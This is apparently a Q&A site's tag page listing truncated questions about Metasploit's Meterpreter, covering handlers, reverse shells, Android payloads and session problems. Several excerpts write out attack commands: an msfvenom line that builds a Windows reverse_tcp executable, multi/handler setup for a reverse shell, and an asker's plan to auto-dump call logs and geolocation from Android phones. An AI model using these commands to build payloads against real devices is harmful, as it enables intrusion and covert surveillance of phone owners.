Questions tagged [meterpreter]
134 questions
0
votes
1 answer
Metasploit - Does the multi handler sends the payload, or just listens for connection
Does the metasploit module: exploit/multi/handler
sends payloads to stagers?
Or does it just listens for an incoming connection like a netcat
listener?
Or does it do both, as needed?
![](../../users/profiles/168744.webp)
0x5929
- 335
- 4
- 13
0
votes
0 answers
Auto execute meterpreter commands on session start(android)
I want my meterpreter to execute the command as soon as it gets the session. My payload is android/meterpreter/reverse_tcp
I want a file that can execute these commands automatically as soon as meterpreter session is…
![](../../users/profiles/216380.webp)
Still_Noob
- 1
- 1
0
votes
0 answers
Meterpreter is failing to load any extension except the core commands
[*] Starting persistent handler(s)...
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LHOST…
![](../../users/profiles/204270.webp)
MD. ROBIUL ISLAM
- 1
- 1
- 1
0
votes
1 answer
How to launch a Metasploit module with arguments in just one command
I am developing my first Metasploit module on Metasploit v5.0.1. I would like to launch my own module in one command with args and not using meterpreter. At this time, I launch my module with these commands:
./msf
use evasion/windows/MyModule
set…
![](../../users/profiles/196241.webp)
Anonyme
- 274
- 2
- 8
0
votes
1 answer
How to response to Meterpreter HTTP Request sent from client
First of all apologies for mistakes as i am at beginner level. I was exploring Meterpreter HTTP Handler. I have created a payload with meterpreter reverse HTTP and writing my own http server for handling requests instead of using Meterpreter's HTTP…
![](../../users/profiles/188792.webp)
Rizwan Ali
- 3
- 1
0
votes
1 answer
How to set autorunscript of core commands?
I'm trying to automate scripts of an Android Metasploit payload. I can successfully automate any script on the /post module, however, I'm trying to automate geolocate, dump_calllog and others that are not on the post module. I think from what I…
![](../../users/profiles/187408.webp)
Pablo Gutierrez
- 1
- 1
0
votes
1 answer
Meterpreter reverse shell alternative
What can you do if you are behind NAT but can't do port forwarding and don't want to pay for a virtual server with internet-facing IP? I read the answer to this question which suggests some tunneling software (e.g. ionide, pwnat) but those have to…
![](../../users/profiles/184331.webp)
Nesa
- 101
- 1
0
votes
1 answer
From SQL Injection in SQLite to shell
I need to obtain a shell from an SQL injection over an application with sqlite database.
Currently my exploit looks like the following:
lucian@0x90:~/$ proxychains nc 10.185.10.55 1101
ProxyChains-3.1…
![](../../users/profiles/98652.webp)
Lucian Nitescu
- 1,802
- 1
- 13
- 27
0
votes
1 answer
Meterpreter file upload - segmentation fault
I'm doing some experiments on two VMs, one running Kali and the other running Ubuntu. I have a problem with the "upload" command of Meterpreter. In particular, I already open a reverse tcp session using the linux/x86/meterpreter_reverse_tcp payload,…
![](../../users/profiles/178661.webp)
damaar
- 3
- 1
- 2
0
votes
2 answers
Meterpreter commands not working in shell
I used use multi/handler followed by set PAYLOAD windows/meterpreter/reverse_tcp then set LPORT 80 and set LHOST 192.168.0.11 after that I do exploit -j -z and go on my Windows machine connected to the same network and connect to 192.168.0.11:80…
![](../../users/profiles/177076.webp)
DapperDaniel
- 29
- 1
- 1
- 4
0
votes
2 answers
MSFvenom payload with dynamic options
I am using MSFvenom to export meterpreter's reverse TCP payload. While this works with msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.131 LPORT=4444 -f -exe > ~/Desktop/shell_meterpreter.exe, however I would like to specify the…
![](../../users/profiles/116721.webp)
Gavin Youker
- 1,270
- 1
- 11
- 23
0
votes
3 answers
How can clicking on a URI infect a host?
I watched a generic information security awareness presentation earlier, in which all that was required for the presenter to penetrate an organisation (with a meterpreter/reverse shell), was for someone on the inside to click, or type (or otherwise…
![](../../users/profiles/83289.webp)
voices
- 1,649
- 7
- 22
- 36
0
votes
1 answer
How to find external ip address a payload uses to connect back to the attacker?
I find myself targeted with a malicious .apk file. I am provided with some malicious files disguised as a genuine .apk.
I used apktool to decompile the file and collect some information about the attacker. I could find none (please point me how to…
![](../../users/profiles/138712.webp)
wishchaser
- 175
- 1
- 1
- 8
0
votes
2 answers
Msfvenom meterpreter android architectures
Is there any android architecture I can set my meterpreter reverse_http payload to that works on every android phone?
Basically, when I don't set any architecture it defaults to dalvik but that architecture does not seem to be working on every phone…
![](../../users/profiles/125454.webp)
pedro santos
- 153
- 2
- 12
0
votes
1 answer
Android meterpreter invalid session
Every time I use a meterpreter reverse https on an android phone over the internet, a session is created but after some seconds it says the session is not valid and it closes. When I do it on the LAN it works fine. So what is the problem? (The phone…
![](../../users/profiles/125454.webp)
pedro santos
- 153
- 2
- 12